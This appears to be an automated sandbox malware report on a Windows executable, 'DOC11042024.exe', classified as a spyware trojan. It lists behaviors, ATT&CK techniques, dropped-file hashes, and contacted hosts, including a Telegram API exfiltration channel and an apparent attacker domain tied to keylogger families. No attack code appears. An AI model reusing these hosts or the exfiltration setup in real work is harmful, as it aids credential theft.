Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Code function: | 0_2_00402706 | |
Source: | Code function: | 0_2_004061E5 | |
Source: | Code function: | 0_2_00405731 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-3705 | ||
Source: | API call chain: | graph_0-3699 |
Source: | Process information queried: | Jump to behavior |
Anti Debugging |
---|
Source: | Thread information set: | Jump to behavior |
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_09040000 |
Source: | Code function: | 0_2_0040620C |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Process created / APC Queued / Resumed: | Jump to behavior |
Source: | Thread APC queued: | Jump to behavior |
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_00405EC4 |
Stealing of Sensitive Information |
---|
Source: | File source: |
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 2 Obfuscated Files or Information | 1 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 311 Process Injection | 1 Software Packing | LSASS Memory | 14 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Security Account Manager | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Masquerading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 131 Virtualization/Sandbox Evasion | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 311 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | |||
19% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
vyebetsh.sa.com | 141.98.10.40 | true | false |
| unknown |
reallyfreegeoip.org | 188.114.96.3 | true | true | unknown | |
api.telegram.org | 149.154.167.220 | true | true | unknown | |
checkip.dyndns.com | 193.122.6.168 | true | false | unknown | |
checkip.dyndns.org | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | unknown | ||
false | unknown | ||
false |
| unknown | |
false | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false | unknown | |||
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true | |
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false | |
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true | |
141.98.10.40 | vyebetsh.sa.com | Lithuania | 209605 | HOSTBALTICLT | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1548204 |
Start date and time: | 2024-11-04 07:12:12 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 40s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | DOC11042024.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@6/15@4/4 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 1372 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description |
---|---|---|
01:13:03 | API Interceptor | |
01:13:41 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
149.154.167.220 | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | |||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | |||
Get hash | malicious | MassLogger RAT | Browse | |||
Get hash | malicious | MicroClip | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | |||
193.122.6.168 | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
188.114.96.3 | Get hash | malicious | GuLoader | Browse |
| |
Get hash | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | Browse |
| ||
Get hash | malicious | SmokeLoader | Browse |
| ||
Get hash | malicious | SmokeLoader | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Azorult, GuLoader | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
reallyfreegeoip.org | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
checkip.dyndns.com | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
api.telegram.org | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | MicroClip | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
ORACLE-BMC-31898US | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
TELEGRAMRU | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | Stealc, Vidar | Browse |
| ||
Get hash | malicious | Stealc, Vidar | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | MicroClip | Browse |
| ||
Get hash | malicious | Stealc, Vidar | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Stealc, Vidar | Browse |
| ||
HOSTBALTICLT | Get hash | malicious | RedLine | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | FormBook, GuLoader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | RisePro Stealer | Browse |
| ||
Get hash | malicious | PrivateLoader, RisePro Stealer | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | Remcos | Browse |
| |
Get hash | malicious | LummaC, Stealc, Vidar | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse |
| ||
Get hash | malicious | LummaC, Stealc | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | LummaC, Stealc, Vidar | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
54328bd36c14bd82ddaa0c04b25ed9ad | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | Remcos | Browse |
| |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Quasar | Browse |
| ||
Get hash | malicious | Quasar | Browse |
| ||
Get hash | malicious | Kronos, Strela Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 14744 |
Entropy (8bit): | 4.992175361088568 |
Encrypted: | false |
SSDEEP: | 384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA |
MD5: | A35685B2B980F4BD3C6FD278EA661412 |
SHA1: | 59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062 |
SHA-256: | 3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930 |
SHA-512: | 70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\DOC11042024.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 964090 |
Entropy (8bit): | 4.764322952518005 |
Encrypted: | false |
SSDEEP: | 6144:68XTkg5Sb127W/6CBY7g+uwGoPkCfUQtUvr38uJVOAiKY83PqZaPL26LZGSaCjwT:SgsJ/z28+u5HC8jr3v+aDi6lJAYgvL/N |
MD5: | 05C2A48278C52703FFA604232A84CC38 |
SHA1: | 026C93046B1827D117F5E986F75839BEBC407F9A |
SHA-256: | 2EFD0227F895EAC9347AC5F9CC58B3835BEE439C2DED4C91EFB73A9E84C255F5 |
SHA-512: | 654F6966F9853931ED4B89CF1E0FC98039FF46960B9F942E617435592E18067D0B4EAFC0EC38348563DA7DA0105BBB7C56731038371A1E81BF8AA7F920B3CC29 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\DOC11042024.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 46 |
Entropy (8bit): | 3.836047762460485 |
Encrypted: | false |
SSDEEP: | 3:CIK5gN0leKbQA5:LKRe7A5 |
MD5: | 1CF88EB768688A65B89C8422C4983163 |
SHA1: | CEC4C169379A3E69CC44E8711753B5359D2CC130 |
SHA-256: | 2BF3BC0DA143B165F824BC0A42BEC0903191F04CB6EDD5DF92C441D034717957 |
SHA-512: | 3F34A000D3001749B58EF64D1C9FABBFCF43B7019FC588D9E123B0A324560D74AF5097F37C98C2CF315CB15C3E4CE47FB79CF4B8AF5AC45AD2BFB0849AC069C2 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\DOC11042024.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 49665 |
Entropy (8bit): | 2.307083160235672 |
Encrypted: | false |
SSDEEP: | 768:zwmvIL4MR38y/hyuUS7CGDpwwqWtHVJCtHnKxzYbv:zvMRbEZGXOKG |
MD5: | 3AFC04CC9C861BC8BC32CD1F35AC5B8A |
SHA1: | 7E3BB9EB009650D5580374F3371CCAB0DC332CC5 |
SHA-256: | FFA9F7F9E9E9F3F6F52A318FBB1D7AC10A62A144E0A0EA9029681B3D2BC8AC2C |
